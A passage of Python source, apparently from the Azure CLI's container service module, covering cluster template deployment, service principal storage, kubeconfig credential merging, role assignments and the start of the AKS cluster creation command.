subscription_id = get_subscription_id(cmd.cli_ctx)
if not dns_name_prefix:
dns_name_prefix = _get_default_dns_prefix(name, resource_group_name, subscription_id)
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
# if api-version is not specified, or specified in a version not supported
# override based on location
if api_version is None or api_version not in ["2017-01-31", "2017-07-01"]:
if location in regions_in_preview:
api_version = "2017-07-01" # 2017-07-01 supported in the preview locations
else:
api_version = "2017-01-31" # 2017-01-31 applied to other locations
if orchestrator_type.lower() == 'kubernetes':
principal_obj = _ensure_service_principal(cmd.cli_ctx, service_principal, client_secret, subscription_id,
dns_name_prefix, location, name)
client_secret = principal_obj.get("client_secret")
service_principal = principal_obj.get("service_principal")
elif windows:
raise CLIError('--windows is only supported for Kubernetes clusters')
# set location if void
if not location:
location = '[resourceGroup().location]'
# set os_type
os_type = 'Linux'
if windows:
os_type = 'Windows'
# set agent_ports if void
if not agent_ports:
agent_ports = []
# get windows_profile
windows_profile = _generate_windows_profile(windows, admin_username, admin_password)
# The resources.properties fields should match with ContainerServices' api model
master_pool_profile = _generate_master_pool_profile(api_version, master_profile, master_count, dns_name_prefix,
master_vm_size, master_osdisk_size, master_vnet_subnet_id,
master_first_consecutive_static_ip, master_storage_profile)
agent_pool_profiles = _generate_agent_pool_profiles(api_version, agent_profiles, agent_count, dns_name_prefix,
agent_vm_size, os_type, agent_osdisk_size, agent_vnet_subnet_id,
agent_ports, agent_storage_profile)
outputs = _generate_outputs(name, orchestrator_type, admin_username)
properties = _generate_properties(api_version, orchestrator_type, orchestrator_version, master_pool_profile,
agent_pool_profiles, ssh_key_value, admin_username, windows_profile)
resource = {
"apiVersion": api_version,
"location": location,
"type": "Microsoft.ContainerService/containerServices",
"name": name,
"tags": tags,
"properties": properties,
}
template = {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"resources": [
resource,
],
"outputs": outputs,
}
params = {}
if service_principal is not None and client_secret is not None:
properties["servicePrincipalProfile"] = {
"clientId": service_principal,
"secret": "[parameters('clientSecret')]",
}
template["parameters"] = {
"clientSecret": {
"type": "secureString",
"metadata": {
"description": "The client secret for the service principal"
}
}
}
params = {
"clientSecret": {
"value": client_secret
}
}
# Due to SPN replication latency, we do a few retries here
max_retry = 30
retry_exception = Exception(None)
for _ in range(0, max_retry):
try:
return _invoke_deployment(cmd, resource_group_name, deployment_name,
template, params, validate, no_wait)
except CloudError as ex:
retry_exception = ex
if 'is not valid according to the validation procedure' in ex.message or \
'The credentials in ServicePrincipalProfile were invalid' in ex.message or \
'not found in Active Directory tenant' in ex.message:
time.sleep(3)
else:
raise ex
raise retry_exception
def store_acs_service_principal(subscription_id, client_secret, service_principal,
file_name='acsServicePrincipal.json'):
obj = {}
if client_secret:
obj['client_secret'] = client_secret
if service_principal:
obj['service_principal'] = service_principal
config_path = os.path.join(get_config_dir(), file_name)
full_config = load_service_principals(config_path=config_path)
if not full_config:
full_config = {}
full_config[subscription_id] = obj
with os.fdopen(os.open(config_path, os.O_RDWR | os.O_CREAT | os.O_TRUNC, 0o600),
'w+') as spFile:
json.dump(full_config, spFile)
def load_acs_service_principal(subscription_id, file_name='acsServicePrincipal.json'):
config_path = os.path.join(get_config_dir(), file_name)
config = load_service_principals(config_path)
if not config:
return None
return config.get(subscription_id)
def load_service_principals(config_path):
if not os.path.exists(config_path):
return None
fd = os.open(config_path, os.O_RDONLY)
try:
with os.fdopen(fd) as f:
return shell_safe_json_parse(f.read())
except: # pylint: disable=bare-except
return None
def _invoke_deployment(cmd, resource_group_name, deployment_name, template, parameters, validate, no_wait,
subscription_id=None):
from azure.cli.core.profiles import ResourceType
DeploymentProperties = cmd.get_models('DeploymentProperties', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
properties = DeploymentProperties(template=template, parameters=parameters, mode='incremental')
smc = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES,
subscription_id=subscription_id).deployments
if validate:
logger.info('==== BEGIN TEMPLATE ====')
logger.info(json.dumps(template, indent=2))
logger.info('==== END TEMPLATE ====')
if cmd.supported_api_version(min_api='2019-10-01', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES):
Deployment = cmd.get_models('Deployment', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
deployment = Deployment(properties=properties)
if validate:
validation_poller = smc.validate(resource_group_name, deployment_name, deployment)
return LongRunningOperation(cmd.cli_ctx)(validation_poller)
return sdk_no_wait(no_wait, smc.create_or_update, resource_group_name, deployment_name, deployment)
if validate:
return smc.validate(resource_group_name, deployment_name, properties)
return sdk_no_wait(no_wait, smc.create_or_update, resource_group_name, deployment_name, properties)
def k8s_get_credentials(cmd, client, name, resource_group_name,
path=os.path.join(os.path.expanduser('~'), '.kube', 'config'),
ssh_key_file=None,
overwrite_existing=False):
"""Download and install kubectl credentials from the cluster master
:param name: The name of the cluster.
:type name: str
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param path: Where to install the kubectl config file
:type path: str
:param ssh_key_file: Path to an SSH key file to use
:type ssh_key_file: str
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_k8s_get_credentials_internal(name, acs_info, path, ssh_key_file, overwrite_existing)
def _k8s_get_credentials_internal(name, acs_info, path, ssh_key_file, overwrite_existing):
if ssh_key_file is not None and not os.path.isfile(ssh_key_file):
raise CLIError('Private key file {} does not exist'.format(ssh_key_file))
dns_prefix = acs_info.master_profile.dns_prefix # pylint: disable=no-member
location = acs_info.location # pylint: disable=no-member
user = acs_info.linux_profile.admin_username # pylint: disable=no-member
_mkdir_p(os.path.dirname(path))
path_candidate = path
ix = 0
while os.path.exists(path_candidate):
ix += 1
path_candidate = '{}-{}-{}'.format(path, name, ix)
# TODO: this only works for public cloud, need other casing for national clouds
acs_client.secure_copy(user, '{}.{}.cloudapp.azure.com'.format(dns_prefix, location),
'.kube/config', path_candidate, key_filename=ssh_key_file)
# merge things
if path_candidate != path:
try:
merge_kubernetes_configurations(path, path_candidate, overwrite_existing)
except yaml.YAMLError as exc:
logger.warning('Failed to merge credentials to kube config file: %s', exc)
logger.warning('The credentials have been saved to %s', path_candidate)
def _handle_merge(existing, addition, key, replace):
if not addition.get(key, False):
return
if not existing.get(key):
existing[key] = addition[key]
return
for i in addition[key]:
for j in existing[key]:
if not i.get('name', False) or not j.get('name', False):
continue
if i['name'] == j['name']:
if replace or i == j:
existing[key].remove(j)
else:
msg = 'A different object named {} already exists in your kubeconfig file.\nOverwrite?'
overwrite = False
try:
overwrite = prompt_y_n(msg.format(i['name']))
except NoTTYException:
pass
if overwrite:
existing[key].remove(j)
else:
msg = 'A different object named {} already exists in {} in your kubeconfig file.'
raise CLIError(msg.format(i['name'], key))
existing[key].append(i)
def load_kubernetes_configuration(filename):
try:
with open(filename) as stream:
return yaml.safe_load(stream)
except (IOError, OSError) as ex:
if getattr(ex, 'errno', 0) == errno.ENOENT:
raise CLIError('{} does not exist'.format(filename))
raise
except (yaml.parser.ParserError, UnicodeDecodeError) as ex:
raise CLIError('Error parsing {} ({})'.format(filename, str(ex)))
def merge_kubernetes_configurations(existing_file, addition_file, replace, context_name=None):
existing = load_kubernetes_configuration(existing_file)
addition = load_kubernetes_configuration(addition_file)
if context_name is not None:
addition['contexts'][0]['name'] = context_name
addition['contexts'][0]['context']['cluster'] = context_name
addition['clusters'][0]['name'] = context_name
addition['current-context'] = context_name
# rename the admin context so it doesn't overwrite the user context
for ctx in addition.get('contexts', []):
try:
if ctx['context']['user'].startswith('clusterAdmin'):
admin_name = ctx['name'] + '-admin'
addition['current-context'] = ctx['name'] = admin_name
break
except (KeyError, TypeError):
continue
if addition is None:
raise CLIError('failed to load additional configuration from {}'.format(addition_file))
if existing is None:
existing = addition
else:
_handle_merge(existing, addition, 'clusters', replace)
_handle_merge(existing, addition, 'users', replace)
_handle_merge(existing, addition, 'contexts', replace)
existing['current-context'] = addition['current-context']
# check that ~/.kube/config is only read- and writable by its owner
if platform.system() != 'Windows':
existing_file_perms = "{:o}".format(stat.S_IMODE(os.lstat(existing_file).st_mode))
if not existing_file_perms.endswith('600'):
logger.warning('%s has permissions "%s".\nIt should be readable and writable only by its owner.',
existing_file, existing_file_perms)
with open(existing_file, 'w+') as stream:
yaml.safe_dump(existing, stream, default_flow_style=False)
current_context = addition.get('current-context', 'UNKNOWN')
msg = 'Merged "{}" as current context in {}'.format(current_context, existing_file)
print(msg)
def _get_host_name(acs_info):
"""
Gets the FQDN from the acs_info object.
:param acs_info: ContainerService object from Azure REST API
:type acs_info: ContainerService
"""
if acs_info is None:
raise CLIError('Missing acs_info')
if acs_info.master_profile is None:
raise CLIError('Missing master_profile')
if acs_info.master_profile.fqdn is None:
raise CLIError('Missing fqdn')
return acs_info.master_profile.fqdn
def _get_username(acs_info):
"""
Gets the admin user name from the Linux profile of the ContainerService object.
:param acs_info: ContainerService object from Azure REST API
:type acs_info: ContainerService
"""
if acs_info.linux_profile is not None:
return acs_info.linux_profile.admin_username
return None
def _get_acs_info(cli_ctx, name, resource_group_name):
"""
Gets the ContainerService object from Azure REST API.
:param name: ACS resource name
:type name: String
:param resource_group_name: Resource group name
:type resource_group_name: String
"""
container_services = cf_container_services(cli_ctx, None)
return container_services.get(resource_group_name, name)
def _rand_str(n):
"""
Gets a random string
"""
choices = string.ascii_lowercase + string.digits
return ''.join(random.SystemRandom().choice(choices) for _ in range(n))
def _mkdir_p(path):
# http://stackoverflow.com/a/600612
try:
os.makedirs(path)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def update_acs(cmd, client, resource_group_name, container_service_name, new_agent_count):
instance = client.get(resource_group_name, container_service_name)
instance.agent_pool_profiles[0].count = new_agent_count # pylint: disable=no-member
# null out the service principal because otherwise validation complains
if instance.orchestrator_profile.orchestrator_type == ContainerServiceOrchestratorTypes.kubernetes:
instance.service_principal_profile = None
# null out the windows profile so that validation doesn't complain about not having the admin password
instance.windows_profile = None
return client.create_or_update(resource_group_name, container_service_name, instance)
def list_container_services(cmd, client, resource_group_name=None):
''' List Container Services. '''
svc_list = client.list_by_resource_group(resource_group_name=resource_group_name) \
if resource_group_name else client.list()
return list(svc_list)
def show_service_principal(client, identifier):
object_id = _resolve_service_principal(client, identifier)
return client.get(object_id)
def _resolve_service_principal(client, identifier):
# todo: confirm with graph team that a service principal name must be unique
result = list(client.list(filter="servicePrincipalNames/any(c:c eq '{}')".format(identifier)))
if result:
return result[0].object_id
try:
uuid.UUID(identifier)
return identifier # assume an object id
except ValueError:
raise CLIError("service principal '{}' doesn't exist".format(identifier))
def create_application(client, display_name, homepage, identifier_uris,
available_to_other_tenants=False, password=None, reply_urls=None,
key_value=None, key_type=None, key_usage=None, start_date=None,
end_date=None, required_resource_accesses=None):
from azure.graphrbac.models import GraphErrorException
password_creds, key_creds = _build_application_creds(password, key_value, key_type,
key_usage, start_date, end_date)
app_create_param = ApplicationCreateParameters(available_to_other_tenants=available_to_other_tenants,
display_name=display_name,
identifier_uris=identifier_uris,
homepage=homepage,
reply_urls=reply_urls,
key_credentials=key_creds,
password_credentials=password_creds,
required_resource_access=required_resource_accesses)
try:
result = client.create(app_create_param, raw=True)
return result.output, result.response.headers["ocp-aad-session-key"]
except GraphErrorException as ex:
if 'insufficient privileges' in str(ex).lower():
link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long
raise CLIError("Directory permission is needed for the current user to register the application. "
"For how to configure, please refer '{}'. Original error: {}".format(link, ex))
raise
def update_application(client, object_id, display_name, homepage, identifier_uris,
available_to_other_tenants=False, password=None, reply_urls=None,
key_value=None, key_type=None, key_usage=None, start_date=None,
end_date=None, required_resource_accesses=None):
from azure.graphrbac.models import GraphErrorException
password_creds, key_creds = _build_application_creds(password, key_value, key_type,
key_usage, start_date, end_date)
try:
if key_creds:
client.update_key_credentials(object_id, key_creds)
if password_creds:
client.update_password_credentials(object_id, password_creds)
if reply_urls:
client.patch(object_id, ApplicationUpdateParameters(reply_urls=reply_urls))
return
except GraphErrorException as ex:
if 'insufficient privileges' in str(ex).lower():
link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long
raise CLIError("Directory permission is needed for the current user to register the application. "
"For how to configure, please refer '{}'. Original error: {}".format(link, ex))
raise
def _build_application_creds(password=None, key_value=None, key_type=None,
key_usage=None, start_date=None, end_date=None):
if password and key_value:
raise CLIError('specify either --password or --key-value, but not both.')
if not start_date:
start_date = datetime.datetime.utcnow()
elif isinstance(start_date, str):
start_date = dateutil.parser.parse(start_date)
if not end_date:
end_date = start_date + relativedelta(years=1)
elif isinstance(end_date, str):
end_date = dateutil.parser.parse(end_date)
key_type = key_type or 'AsymmetricX509Cert'
key_usage = key_usage or 'Verify'
password_creds = None
key_creds = None
if password:
password_creds = [PasswordCredential(start_date=start_date, end_date=end_date,
key_id=str(uuid.uuid4()), value=password)]
elif key_value:
key_creds = [KeyCredential(start_date=start_date, end_date=end_date, value=key_value,
key_id=str(uuid.uuid4()), usage=key_usage, type=key_type)]
return (password_creds, key_creds)
def create_service_principal(cli_ctx, identifier, resolve_app=True, rbac_client=None):
if rbac_client is None:
rbac_client = get_graph_rbac_management_client(cli_ctx)
if resolve_app:
try:
uuid.UUID(identifier)
result = list(rbac_client.applications.list(filter="appId eq '{}'".format(identifier)))
except ValueError:
result = list(rbac_client.applications.list(
filter="identifierUris/any(s:s eq '{}')".format(identifier)))
if not result: # assume we get an object id
result = [rbac_client.applications.get(identifier)]
app_id = result[0].app_id
else:
app_id = identifier
return rbac_client.service_principals.create(ServicePrincipalCreateParameters(app_id=app_id, account_enabled=True))
def create_role_assignment(cli_ctx, role, assignee, is_service_principal, resource_group_name=None, scope=None):
return _create_role_assignment(cli_ctx,
role, assignee, resource_group_name,
scope, resolve_assignee=is_service_principal)
def _create_role_assignment(cli_ctx, role, assignee,
resource_group_name=None, scope=None, resolve_assignee=True):
from azure.cli.core.profiles import ResourceType, get_sdk
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
scope = _build_role_scope(resource_group_name, scope, assignments_client.config.subscription_id)
role_id = _resolve_role_id(role, scope, definitions_client)
# If the cluster has service principal resolve the service principal client id to get the object id,
# if not use MSI object id.
object_id = _resolve_object_id(cli_ctx, assignee) if resolve_assignee else assignee
RoleAssignmentCreateParameters = get_sdk(cli_ctx, ResourceType.MGMT_AUTHORIZATION,
'RoleAssignmentCreateParameters', mod='models',
operation_group='role_assignments')
parameters = RoleAssignmentCreateParameters(role_definition_id=role_id, principal_id=object_id)
assignment_name = uuid.uuid4()
custom_headers = None
return assignments_client.create(scope, assignment_name, parameters, custom_headers=custom_headers)
def _build_role_scope(resource_group_name, scope, subscription_id):
subscription_scope = '/subscriptions/' + subscription_id
if scope:
if resource_group_name:
err = 'Resource group "{}" is redundant because scope is supplied'
raise CLIError(err.format(resource_group_name))
elif resource_group_name:
scope = subscription_scope + '/resourceGroups/' + resource_group_name
else:
scope = subscription_scope
return scope
def _resolve_role_id(role, scope, definitions_client):
role_id = None
try:
uuid.UUID(role)
role_id = role
except ValueError:
pass
if not role_id: # retrieve role id
role_defs = list(definitions_client.list(scope, "roleName eq '{}'".format(role)))
if not role_defs:
raise CLIError("Role '{}' doesn't exist.".format(role))
if len(role_defs) > 1:
ids = [r.id for r in role_defs]
err = "More than one role matches the given name '{}'. Please pick a value from '{}'"
raise CLIError(err.format(role, ids))
role_id = role_defs[0].id
return role_id
def _resolve_object_id(cli_ctx, assignee):
client = get_graph_rbac_management_client(cli_ctx)
result = None
if assignee.find('@') >= 0: # looks like a user principal name
result = list(client.users.list(filter="userPrincipalName eq '{}'".format(assignee)))
if not result:
result = list(client.service_principals.list(
filter="servicePrincipalNames/any(c:c eq '{}')".format(assignee)))
if not result: # assume an object id, let us verify it
result = _get_object_stubs(client, [assignee])
# 2+ matches should never happen, so we only check 'no match' here
if not result:
raise CLIError("No matches in graph database for '{}'".format(assignee))
return result[0].object_id
def _get_object_stubs(graph_client, assignees):
params = GetObjectsParameters(include_directory_object_references=True,
object_ids=assignees)
return list(graph_client.objects.get_objects_by_object_ids(params))
def _update_dict(dict1, dict2):
cp = dict1.copy()
cp.update(dict2)
return cp
def subnet_role_assignment_exists(cli_ctx, scope):
network_contributor_role_id = "4d97b98b-1d4f-4787-a291-c67834d212e7"
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
if i.scope == scope and i.role_definition_id.endswith(network_contributor_role_id):
return True
return False
# pylint: disable=too-many-statements
def aks_browse(cmd, client, resource_group_name, name, disable_browser=False,
listen_address='127.0.0.1', listen_port='8001'):
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
# verify the kube-dashboard addon was not disabled
instance = client.get(resource_group_name, name)
addon_profiles = instance.addon_profiles or {}
# addon name is case insensitive
addon_profile = next((addon_profiles[k] for k in addon_profiles if k.lower() == 'kubeDashboard'.lower()),
ManagedClusterAddonProfile(enabled=False))
if not addon_profile.enabled:
raise CLIError('The kube-dashboard addon was disabled for this managed cluster.\n'
'To use "az aks browse" first enable the add-on '
'by running "az aks enable-addons --addons kube-dashboard".\n'
'Starting with Kubernetes 1.19, AKS no longer support installation of '
'the managed kube-dashboard addon.\n'
'Please use the Kubernetes resources view in the Azure portal (preview) instead.')
_, browse_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name, name, admin=False, path=browse_path)
# find the dashboard pod's name
try:
dashboard_pod = subprocess.check_output(
["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system",
"--output", "name", "--selector", "k8s-app=kubernetes-dashboard"],
universal_newlines=True)
except subprocess.CalledProcessError as err:
raise CLIError('Could not find dashboard pod: {}'.format(err))
if dashboard_pod:
# remove any "pods/" or "pod/" prefix from the name
dashboard_pod = str(dashboard_pod).split('/')[-1].strip()
else:
raise CLIError("Couldn't find the Kubernetes dashboard pod.")
# find the port
try:
dashboard_port = subprocess.check_output(
["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system",
"--selector", "k8s-app=kubernetes-dashboard",
"--output", "jsonpath='{.items[0].spec.containers[0].ports[0].containerPort}'"]
)
# output format: b"'{port}'"
dashboard_port = int((dashboard_port.decode('utf-8').replace("'", "")))
except subprocess.CalledProcessError as err:
raise CLIError('Could not find dashboard port: {}'.format(err))
# use https if dashboard container is using https
if dashboard_port == 8443:
protocol = 'https'
else:
protocol = 'http'
proxy_url = 'http://{0}:{1}/'.format(listen_address, listen_port)
dashboardURL = '{0}/api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(proxy_url,
protocol)
# launch kubectl port-forward locally to access the remote dashboard
if in_cloud_console():
# TODO: better error handling here.
response = requests.post('http://localhost:8888/openport/{0}'.format(listen_port))
result = json.loads(response.text)
dashboardURL = '{0}api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(
result['url'], protocol)
term_id = os.environ.get('ACC_TERM_ID')
if term_id:
response = requests.post('http://localhost:8888/openLink/{0}'.format(term_id),
json={"url": dashboardURL})
logger.warning('To view the console, please open %s in a new tab', dashboardURL)
else:
logger.warning('Proxy running on %s', proxy_url)
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async(dashboardURL)
try:
try:
subprocess.check_output(["kubectl", "--kubeconfig", browse_path, "proxy", "--address",
listen_address, "--port", listen_port], stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as err:
if err.output.find(b'unknown flag: --address'):
if listen_address != '127.0.0.1':
logger.warning('"--address" is only supported in kubectl v1.13 and later.')
logger.warning('The "--listen-address" argument will be ignored.')
subprocess.call(["kubectl", "--kubeconfig", browse_path, "proxy", "--port", listen_port])
except KeyboardInterrupt:
# Let command processing finish gracefully after the user presses [Ctrl+C]
pass
finally:
if in_cloud_console():
requests.post('http://localhost:8888/closeport/8001')
def _trim_nodepoolname(nodepool_name):
if not nodepool_name:
return "nodepool1"
return nodepool_name[:12]
def _validate_ssh_key(no_ssh_key, ssh_key_value):
if not no_ssh_key:
try:
if not ssh_key_value or not is_valid_ssh_rsa_public_key(ssh_key_value):
raise ValueError()
except (TypeError, ValueError):
shortened_key = truncate_text(ssh_key_value)
raise CLIError('Provided ssh key ({}) is invalid or non-existent'.format(shortened_key))
def _add_monitoring_role_assignment(result, cluster_resource_id, cmd):
service_principal_msi_id = None
# Check if service principal exists, if it does, assign permissions to service principal
# Else, provide permissions to MSI
if (
hasattr(result, 'service_principal_profile') and
hasattr(result.service_principal_profile, 'client_id') and
result.service_principal_profile.client_id.lower() != 'msi'
):
logger.info('valid service principal exists, using it')
service_principal_msi_id = result.service_principal_profile.client_id
is_service_principal = True
elif (
(hasattr(result, 'addon_profiles')) and
('omsagent' in result.addon_profiles) and
(hasattr(result.addon_profiles['omsagent'], 'identity')) and
(hasattr(result.addon_profiles['omsagent'].identity, 'object_id'))
):
logger.info('omsagent MSI exists, using it')
service_principal_msi_id = result.addon_profiles['omsagent'].identity.object_id
is_service_principal = False
if service_principal_msi_id is not None:
if not _add_role_assignment(cmd.cli_ctx, 'Monitoring Metrics Publisher',
service_principal_msi_id, is_service_principal, scope=cluster_resource_id):
logger.warning('Could not create a role assignment for Monitoring addon. '
'Are you an Owner on this subscription?')
else:
logger.warning('Could not find service principal or user assigned MSI for role'
'assignment')
# pylint: disable=too-many-statements,too-many-branches
def aks_create(cmd, client, resource_group_name, name, ssh_key_value, # pylint: disable=too-many-locals
dns_name_prefix=None,
location=None,
admin_username="azureuser",
windows_admin_username=None,
windows_admin_password=None,
enable_ahub=False,
kubernetes_version='',
node_vm_size="Standard_DS2_v2",
node_osdisk_size=0,
node_osdisk_diskencryptionset_id=None,
node_count=3,
nodepool_name="nodepool1",
nodepool_tags=None,
nodepool_labels=None,
service_principal=None, client_secret=None,
no_ssh_key=False,
disable_rbac=None,
enable_rbac=None,
vm_set_type=None,
skip_subnet_role_assignment=False,
enable_cluster_autoscaler=False,
cluster_autoscaler_profile=None,
network_plugin=None,
network_policy=None,
uptime_sla=False,
pod_cidr=None,
service_cidr=None,
dns_service_ip=None,
docker_bridge_address=None,
load_balancer_sku=None,
load_balancer_managed_outbound_ip_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
outbound_type=None,
enable_addons=None,
workspace_resource_id=None,
vnet_subnet_id=None,
max_pods=0,
min_count=None,
max_count=None,
aad_client_app_id=None,
aad_server_app_id=None,
aad_server_app_secret=None,
aad_tenant_id=None,
tags=None,
zones=None,
enable_node_public_ip=False,
generate_ssh_keys=False, # pylint: disable=unused-argument
api_server_authorized_ip_ranges=None,
enable_private_cluster=False,
enable_managed_identity=False,
attach_acr=None,
enable_aad=False,
aad_admin_group_object_ids=None,
aci_subnet_name=None,
no_wait=False):
_validate_ssh_key(no_ssh_key, ssh_key_value)
subscription_id = get_subscription_id(cmd.cli_ctx)
if not dns_name_prefix:
dns_name_prefix = _get_default_dns_prefix(name, resource_group_name, subscription_id)
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
vm_set_type = _set_vm_set_type(vm_set_type, kubernetes_version)
load_balancer_sku = set_load_balancer_sku(load_balancer_sku, kubernetes_version)
if api_server_authorized_ip_ranges and load_balancer_sku == "basic":
raise CLIError('--api-server-authorized-ip-ranges can only be used with standard load balancer')
agent_pool_profile = ManagedClusterAgentPoolProfile(
name=_trim_nodepoolname(nodepool_name), # Must be 12 chars or less before ACS RP adds to it
tags=nodepool_tags,
node_labels=nodepool_labels,
count=int(node_count),
vm_size=node_vm_size,
os_type="Linux",
storage_profile=ContainerServiceStorageProfileTypes.managed_disks,
vnet_subnet_id=vnet_subnet_id,
availability_zones=zones,
enable_node_public_ip=enable_node_public_ip,
max_pods=int(max_pods) if max_pods else None,
type=vm_set_type,
mode="System"
)
if node_osdisk_size:
agent_pool_profile.os_disk_size_gb = int(node_osdisk_size)
_check_cluster_autoscaler_flag(enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool_profile)
linux_profile = None
# LinuxProfile is just used for SSH access to VMs, so omit it if --no-ssh-key was specified.
if not no_ssh_key:
ssh_config = ContainerServiceSshConfiguration(
public_keys=[ContainerServiceSshPublicKey(key_data=ssh_key_value)])
linux_profile = ContainerServiceLinuxProfile(admin_username=admin_username, ssh=ssh_config)
windows_profile = None
if windows_admin_username or windows_admin_password:
# To avoid that windows_admin_password is set but windows_admin_username is not
if windows_admin_username is None:
try:
from knack.prompting import prompt
windows_admin_username = prompt('windows_admin_username: ')
# The validation for admin_username in ManagedClusterWindowsProfile will fail even if
# users still set windows_admin_username to empty here
except NoTTYException:
raise CLIError('Please specify username for Windows in non-interactive mode.')
if windows_admin_password is None:
try:
windows_admin_password = prompt_pass(
msg='windows-admin-password: ', confirm=True)
except NoTTYException:
raise CLIError(
'Please specify both username and password in non-interactive mode.')
windows_license_type = None
if enable_ahub:
windows_license_type = 'Windows_Server'
windows_profile = ManagedClusterWindowsProfile(
admin_username=windows_admin_username,
admin_password=windows_admin_password,
license_type=windows_license_type)
# Skip create service principal profile for the cluster if the cluster
# enables managed identity and customer doesn't explicitly provide a service principal.
service_principal_profile = None
principal_obj = None
if not(enable_managed_identity and not service_principal and not client_secret):
principal_obj = _ensure_aks_service_principal(cmd.cli_ctx,
service_principal=service_principal, client_secret=client_secret,
subscription_id=subscription_id, dns_name_prefix=dns_name_prefix,
location=location, name=name)
service_principal_profile = ManagedClusterServicePrincipalProfile(
client_id=principal_obj.get("service_principal"),
secret=principal_obj.get("client_secret"),
key_vault_secret_ref=None)
if (vnet_subnet_id and not skip_subnet_role_assignment and
not subnet_role_assignment_exists(cmd.cli_ctx, vnet_subnet_id)):
# if service_principal_profile is None, then this cluster is an MSI cluster,
# and the service principal does not exist. For now, We just tell user to grant the
# permission after the cluster is created to keep consistent with portal experience.
if service_principal_profile is None:
logger.warning('The cluster is an MSI cluster, please manually grant '
'Network Contributor role to the system assigned identity '
'after the cluster is created, see '
'https://docs.microsoft.com/en-us/azure/aks/use-managed-identity')
else:
scope = vnet_subnet_id
if not _add_role_assignment(cmd.cli_ctx, 'Network Contributor',
service_principal_profile.client_id, scope=scope):
logger.warning('Could not create a role assignment for subnet. '
'Are you an Owner on this subscription?')
load_balancer_profile = create_load_balancer_profile(
load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout)
if attach_acr:
if enable_managed_identity:
if no_wait:
raise CLIError('When --attach-acr and --enable-managed-identity are both specified, '
'--no-wait is not allowed, please wait until the whole operation succeeds.')
# Attach acr operation will be handled after the cluster is created
else:
_ensure_aks_acr(cmd.cli_ctx,
client_id=service_principal_profile.client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
outbound_type = _set_outbound_type(outbound_type, vnet_subnet_id, load_balancer_sku, load_balancer_profile)
network_profile = None
if any([network_plugin, pod_cidr, service_cidr, dns_service_ip,
docker_bridge_address, network_policy]):
if not network_plugin:
raise CLIError('Please explicitly specify the network plugin type')
if pod_cidr and network_plugin == "azure":
raise CLIError('Please use kubenet as the network plugin type when pod_cidr is specified')
network_profile = ContainerServiceNetworkProfile(
network_plugin=network_plugin,
pod_cidr=pod_cidr,
service_cidr=service_cidr,
dns_service_ip=dns_service_ip,
docker_bridge_cidr=docker_bridge_address,
network_policy=network_policy,
load_balancer_sku=load_balancer_sku.lower(),
load_balancer_profile=load_balancer_profile,
outbound_type=outbound_type
)
else:
if load_balancer_sku.lower() == "standard" or load_balancer_profile:
network_profile = ContainerServiceNetworkProfile(
network_plugin="kubenet",
load_balancer_sku=load_balancer_sku.lower(),
load_balancer_profile=load_balancer_profile,
outbound_type=outbound_type,
)
if load_balancer_sku.lower() == "basic":
network_profile = ContainerServiceNetworkProfile(
load_balancer_sku=load_balancer_sku.lower(),
)
addon_profiles = _handle_addons_args(
cmd,
enable_addons,
subscription_id,
resource_group_name,
{},
workspace_resource_id,
aci_subnet_name,
vnet_subnet_id
)
monitoring = False
if 'omsagent' in addon_profiles:
monitoring = True
_ensure_container_insights_for_monitoring(cmd, addon_profiles['omsagent'])
aad_profile = None
if enable_aad:
if any([aad_client_app_id, aad_server_app_id, aad_server_app_secret]):
raise CLIError('"--enable-aad" cannot be used together with '
'"--aad-client-app-id/--aad-server-app-id/--aad-server-app-secret"')
aad_profile = ManagedClusterAADProfile(
managed=True,
admin_group_object_ids=_parse_comma_separated_list(aad_admin_group_object_ids),
tenant_id=aad_tenant_id
)
else:
if any([aad_client_app_id, aad_server_app_id, aad_server_app_secret, aad_tenant_id]):
if aad_tenant_id is None:
profile = Profile(cli_ctx=cmd.cli_ctx)
_, _, aad_tenant_id = profile.get_login_credentials()
aad_profile = ManagedClusterAADProfile(
client_app_id=aad_client_app_id,
server_app_id=aad_server_app_id,
server_app_secret=aad_server_app_secret,
tenant_id=aad_tenant_id
)
api_server_access_profile = None
if enable_private_cluster and load_balancer_sku.lower() != "standard":
raise CLIError("Please use standard load balancer for private cluster")
if api_server_authorized_ip_ranges or enable_private_cluster:
api_server_access_profile = _populate_api_server_access_profile(
api_server_authorized_ip_ranges,
enable_private_cluster=enable_private_cluster
)
# Check that both --disable-rbac and --enable-rbac weren't provided
if all([disable_rbac, enable_rbac]):
